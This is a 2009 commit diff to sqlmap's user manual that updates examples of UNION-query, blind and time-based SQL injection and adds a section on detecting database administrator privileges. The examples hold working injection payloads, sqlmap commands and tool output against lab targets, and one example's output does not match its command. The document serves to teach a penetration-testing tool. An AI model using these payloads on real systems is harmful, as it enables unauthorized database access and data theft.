Updated user's manual

2024-11-25 11:03:47 +03:00 · 2009-01-19 23:45:54 +00:00 · 2009-01-19 23:45:54 +00:00 · 7adbf5892d
commit 7adbf5892d
parent c25b49e80e
3 changed files with 165 additions and 45 deletions
--- a/doc/README.html
+++ b/doc/README.html
@ -187,7 +187,7 @@ in the following section to go ahead with the exploiting.</LI>
 vulnerability:</P>
 <P>
 <UL>
-<LI><B>Inferential Blind SQL injection</B>: sqlmap appends to the
+<LI><B>Inferential blind SQL injection</B>: sqlmap appends to the
 affected parameter in the HTTP request, a syntatically valid SQL statement
 string containing a <CODE>SELECT</CODE> sub-statement, or any other SQL
 statement whose the user want to retrieve the output.
@ -1600,7 +1600,7 @@ the real world application it is necessary to provide it.</P>
 <P>Options: <CODE>--string</CODE> and <CODE>--regexp</CODE></P>
 <P>By default the distinction of a True query by a False one (basic concept
-for Inferential Blind SQL injection attacks) is done comparing injected
+for Inferential blind SQL injection attacks) is done comparing injected
 requests page content MD5 hash with the original not injected page content
 MD5 hash.
 Not always this concept works because sometimes the page content changes at
@ -1964,8 +1964,8 @@ time based blind sql injection payload:    'name=luther'; WAITFOR DELAY '0:0:5';
 <P>Options: <CODE>--union-test</CODE> and <CODE>--union-tech</CODE></P>
-<P>It is possible to test if the target URL is affected by an <B>inband
+<P>It is possible to test if the target URL is affected by a <B>UNION query
-SQL injection</B> vulnerability.
+(inband) SQL injection</B> vulnerability.
 Refer to the <EM>Techniques</EM> section for details on this SQL injection
 technique.</P>
@ -1979,38 +1979,46 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" \
 [...]
 back-end DBMS:  Oracle
-[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:27] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
+technique
 [hh:mm:27] [INFO] the target url could be affected by an inband sql injection vulnerability
 valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
-NULL, NULL, NULL FROM DUAL-- AND 5601=5601'
+NULL, NULL, NULL FROM DUAL-- AND 6558=6558'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>By default sqlmap uses the <B><CODE>NULL</CODE> bruteforcing</B> technique to
 detect the number of columns within the original <CODE>SELECT</CODE> statement.
 It is also possible to change it to <B><CODE>ORDER BY</CODE> clause
 bruteforcing</B> with the <CODE>--union-tech</CODE> option.</P>
 <P>Further details on these techniques can be found 
 <A HREF="http://bernardodamele.blogspot.com/2007/07/insight-on-union-query-sql-injection.html">here</A>.</P>
 <P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" \
-  --union-test -v 1
+  --union-test --union-tech orderby -v 1
 [...]
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
 back-end DBMS: PostgreSQL
-[hh:mm:29] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:51] [INFO] testing inband sql injection on parameter 'id' with ORDER BY clause 
-[hh:mm:29] [INFO] the target url could be affected by an inband sql injection vulnerability
+bruteforcing technique
-valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT NULL, 
+[hh:mm:51] [INFO] the target url could be affected by an inband sql injection vulnerability
-NULL, NULL-- AND 'iBEMR'='iBEMR'
+valid union:    'http://192.168.1.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND 
 1262=1262'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>As you can see, the target URL parameter <CODE>id</CODE> might be also
-affected by an inband SQL injection.
+exploitable by the inband SQL injection technique.
-In case this vulnerability is exploitable it is strongly recommended to
+In case a case it is strongly recommended to use this technique which saves
-use this technique which saves a lot of time.</P>
+a lot of time.</P>
 <P>It is strongly recommended to run at least once sqlmap with the
 <CODE>--union-test</CODE> option to test if the affected parameter is used
@ -2048,7 +2056,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1
 back-end DBMS:  Microsoft SQL Server 2000
 [hh:mm:42] [INFO] fetching banner
-[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:42] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
 technique
 [hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
 [hh:mm:42] [INFO] confirming full inband sql injection on parameter 'id'
 [hh:mm:42] [INFO] the target url is affected by an exploitable full inband sql injection 
@ -2141,7 +2150,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.ph
 back-end DBMS: MySQL >= 5.0.0
 [hh:mm:56] [INFO] fetching database names
-[hh:mm:56] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:56] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
 technique
 [hh:mm:56] [INFO] the target url could be affected by an inband sql injection vulnerability
 [hh:mm:56] [INFO] confirming full inband sql injection on parameter 'id'
 [hh:mm:56] [WARNING] the target url is not affected by an exploitable full inband sql 
@ -2622,6 +2632,54 @@ current database:    'master'
 </P>
 <H3>Detect if the DBMS current user is a database administrator</H3>
 <P>Option: <CODE>--is-dba</CODE></P>
 <P>It is possible to detect if the  database management system session user is
 a database administrator.</P>
 <P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1
 [...]
 back-end DBMS: PostgreSQL
 [hh:mm:52] [INFO] testing if current user is DBA
 [hh:mm:52] [INFO] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE 
 usename=CURRENT_USER OFFSET 0 LIMIT 1)=CHR(116)||CHR(114)||CHR(117)||CHR(101)) THEN 1 
 ELSE 0 END)
 [hh:mm:52] [INFO] retrieved: 
 [hh:mm:52] [INFO] performed 6 queries in 0 seconds
 current user is DBA:    'False'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --is-dba -v 1
 [...]
 back-end DBMS: Oracle
 [16:40:57] [INFO] testing if current user is DBA
 [16:40:58] [INFO] query: SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE 
 GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE=CHR(68)||CHR(66)||CHR(65))=CHR(68)||CHR(66)||CHR(65)) 
 THEN 1 ELSE 0 END) FROM DUAL
 [16:40:58] [INFO] retrieved: 1
 [16:40:58] [INFO] performed 13 queries in 0 seconds
 current user is DBA:    'True'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <H3>Users</H3>
 <P>Option: <CODE>--users</CODE></P>
@ -3484,10 +3542,11 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql
 [...]
 [hh:mm:03] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
-[hh:mm:03] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:03] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
 technique
 [hh:mm:03] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:03] [INFO] confirming inband sql injection on parameter 'id'
+[hh:mm:03] [INFO] confirming full inband sql injection on parameter 'id'
-[hh:mm:03] [INFO] the target url is affected by an exploitable inband sql injection
+[hh:mm:03] [INFO] the target url is affected by an exploitable full inband sql injection
 vulnerability
 [hh:mm:03] [INFO] query:  UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+
 CHAR(70)+CHAR(67))+ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32)))
--- a/doc/README.pdf
+++ b/doc/README.pdf
--- a/doc/README.sgml
+++ b/doc/README.sgml
@ -144,7 +144,7 @@ sqlmap implements three techniques to exploit a SQL injection
 vulnerability:
 <itemize>
-<item><bf>Inferential Blind SQL injection</bf>: sqlmap appends to the
+<item><bf>Inferential blind SQL injection</bf>: sqlmap appends to the
 affected parameter in the HTTP request, a syntatically valid SQL statement
 string containing a <tt>SELECT</tt> sub-statement, or any other SQL
 statement whose the user want to retrieve the output.
@ -1539,7 +1539,7 @@ Options: <tt>--string</tt> and <tt>--regexp</tt>
 <p>
 By default the distinction of a True query by a False one (basic concept
-for Inferential Blind SQL injection attacks) is done comparing injected
+for Inferential blind SQL injection attacks) is done comparing injected
 requests page content MD5 hash with the original not injected page content
 MD5 hash.
 Not always this concept works because sometimes the page content changes at
@ -1897,8 +1897,8 @@ time based blind sql injection payload:    'name=luther'; WAITFOR DELAY '0:0:5';
 Options: <tt>--union-test</tt> and <tt>--union-tech</tt>
 <p>
-It is possible to test if the target URL is affected by an <bf>inband
+It is possible to test if the target URL is affected by a <bf>UNION query
-SQL injection</bf> vulnerability.
+(inband) SQL injection</bf> vulnerability.
 Refer to the <em>Techniques</em> section for details on this SQL injection
 technique.
@ -1912,35 +1912,45 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" \
 [...]
 back-end DBMS:  Oracle
-[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:27] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
+technique
 [hh:mm:27] [INFO] the target url could be affected by an inband sql injection vulnerability
 valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
-NULL, NULL, NULL FROM DUAL-- AND 5601=5601'
+NULL, NULL, NULL FROM DUAL-- AND 6558=6558'
 </verb></tscreen>
 <p>
 By default sqlmap uses the <bf><tt>NULL</tt> bruteforcing</bf> technique to
 detect the number of columns within the original <tt>SELECT</tt> statement.
 It is also possible to change it to <bf><tt>ORDER BY</tt> clause
 bruteforcing</bf> with the <tt>--union-tech</tt> option.
 <p>
 Further details on these techniques can be found <htmlurl
 url="http://bernardodamele.blogspot.com/2007/07/insight-on-union-query-sql-injection.html" name="here">.
 <p>
 Example on a <bf>PostgreSQL 8.3.5</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" \
-  --union-test -v 1
+  --union-test --union-tech orderby -v 1
 [...]
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
 back-end DBMS: PostgreSQL
-[hh:mm:29] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:51] [INFO] testing inband sql injection on parameter 'id' with ORDER BY clause 
-[hh:mm:29] [INFO] the target url could be affected by an inband sql injection vulnerability
+bruteforcing technique
-valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT NULL, 
+[hh:mm:51] [INFO] the target url could be affected by an inband sql injection vulnerability
-NULL, NULL-- AND 'iBEMR'='iBEMR'
+valid union:    'http://192.168.1.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND 
 1262=1262'
 </verb></tscreen>
 <p>
 As you can see, the target URL parameter <tt>id</tt> might be also
-affected by an inband SQL injection.
+exploitable by the inband SQL injection technique.
-In case this vulnerability is exploitable it is strongly recommended to
+In case a case it is strongly recommended to use this technique which saves
-use this technique which saves a lot of time.
+a lot of time.
 <p>
 It is strongly recommended to run at least once sqlmap with the
@ -1981,7 +1991,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1
 back-end DBMS:	Microsoft SQL Server 2000
 [hh:mm:42] [INFO] fetching banner
-[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:42] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
 technique
 [hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
 [hh:mm:42] [INFO] confirming full inband sql injection on parameter 'id'
 [hh:mm:42] [INFO] the target url is affected by an exploitable full inband sql injection 
@ -2073,7 +2084,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.ph
 back-end DBMS: MySQL >= 5.0.0
 [hh:mm:56] [INFO] fetching database names
-[hh:mm:56] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:56] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
 technique
 [hh:mm:56] [INFO] the target url could be affected by an inband sql injection vulnerability
 [hh:mm:56] [INFO] confirming full inband sql injection on parameter 'id'
 [hh:mm:56] [WARNING] the target url is not affected by an exploitable full inband sql 
@ -2123,6 +2135,8 @@ page content.
 <sect2>Extensive database management system fingerprint
 <!-- TODO: improve examples on basic DBMS fingerprint -->
 <p>
 Options: <tt>-f</tt> or <tt>--fingerprint</tt>
@ -2535,6 +2549,52 @@ current database:    'master'
 </verb></tscreen>
 <sect2>Detect if the DBMS current user is a database administrator
 <p>
 Option: <tt>--is-dba</tt>
 <p>
 It is possible to detect if the  database management system session user is
 a database administrator.
 <p>
 Example on a <bf>PostgreSQL 8.3.5</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1
 [...]
 back-end DBMS: PostgreSQL
 [hh:mm:52] [INFO] testing if current user is DBA
 [hh:mm:52] [INFO] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE 
 usename=CURRENT_USER OFFSET 0 LIMIT 1)=CHR(116)||CHR(114)||CHR(117)||CHR(101)) THEN 1 
 ELSE 0 END)
 [hh:mm:52] [INFO] retrieved: 
 [hh:mm:52] [INFO] performed 6 queries in 0 seconds
 current user is DBA:    'False'
 </verb></tscreen>
 <p>
 Example on an <bf>Oracle XE 10.2.0.1</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --is-dba -v 1
 [...]
 back-end DBMS: Oracle
 [16:40:57] [INFO] testing if current user is DBA
 [16:40:58] [INFO] query: SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE 
 GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE=CHR(68)||CHR(66)||CHR(65))=CHR(68)||CHR(66)||CHR(65)) 
 THEN 1 ELSE 0 END) FROM DUAL
 [16:40:58] [INFO] retrieved: 1
 [16:40:58] [INFO] performed 13 queries in 0 seconds
 current user is DBA:    'True'
 </verb></tscreen>
 <sect2>Users
 <p>
@ -3334,7 +3394,7 @@ as a users' database.
 <sect2>Run your own SQL statement
-<!-- TODO: improve -->
+<!-- TODO: improve with example on INSERT/DROP/xp_cmdshell -->
 <p>
 Options: <tt>--sql-query</tt> and <tt>--sql-shell</tt>
@ -3390,10 +3450,11 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql
 [...]
 [hh:mm:03] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
-[hh:mm:03] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:03] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
 technique
 [hh:mm:03] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:03] [INFO] confirming inband sql injection on parameter 'id'
+[hh:mm:03] [INFO] confirming full inband sql injection on parameter 'id'
-[hh:mm:03] [INFO] the target url is affected by an exploitable inband sql injection
+[hh:mm:03] [INFO] the target url is affected by an exploitable full inband sql injection
 vulnerability
 [hh:mm:03] [INFO] query:  UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+
 CHAR(70)+CHAR(67))+ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32)))